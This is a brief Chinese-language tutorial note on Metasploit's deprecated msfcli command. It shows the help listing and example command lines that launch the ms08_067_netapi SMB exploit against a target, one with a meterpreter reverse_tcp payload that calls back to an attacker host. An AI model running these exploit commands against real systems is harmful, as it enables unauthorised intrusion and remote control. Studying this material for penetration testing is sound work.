原文:《metasploit the pentration tester’s guide》


msfcli命令为方便metasploit框架和其他的shell交互而设计. 2015年6月8号 被弃用了


root@xxoo:~# msfcli -h
Usage: /opt/metasploit/msf3/msfcli <exploit_name> <option=value> [mode]
=======================================================================

Mode Description
—- ———–
(A)dvanced Show available advanced options for this module      #显示该模块的所有高级配置选项 (AC)tions Show available actions for this auxiliary module            #显示辅助模块的所有可用动作 (C)heck Run the check routine of the selected module            #运行选定模块的检查例程

(E)xecute Execute the selected module                    #运行选定的模块

(H)elp You’re looking at it baby!                      #帮助信息                    
(I)DS Evasion Show available ids evasion options for this module  #显示该模块的可用IDS逃逸选项(O)ptions Show available options for this module                        #显示所有配置选项

(P)ayloads Show available payloads for this module                #显示该模块适用的攻击载荷 (S)ummary Show information about this module                   #显示关于该模块详细信息

(T)argets Show available targets for this exploit module      #显示渗透攻击模块的所有攻击目标类型


查看某一个exploit的options :

root@xxoo:~# msfcli windows/smb/ms08_067_netapi O

 

设置options 同时显示payloads的命令如下:

root@xxoo:~# msfcli windows/smb/ms08_067_netapi RHOST=127.0.0.1 P


设置好options,payloads然后执行exploit的命令如下:

root@xxoo:~# msfcli windows/smb/ms08_067_netapi RHOST=www.xx.com PAYLOAD=windows/meterpreter/reverse_tcp LHOST=xxoo E



root@xxoo:~# msfcli | grep exploit
仅列出渗透攻击模块。


root@xxoo:~# msfcli | grep exploit/windows
仅列出与windows相关的渗透攻击模块。


root@xxoo:~# msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=PORT RHOST=IP E
对IP发起ms08_067_netapi渗透攻击,配置了bind_tcp攻击载荷,并绑定在PORT端口进行监听。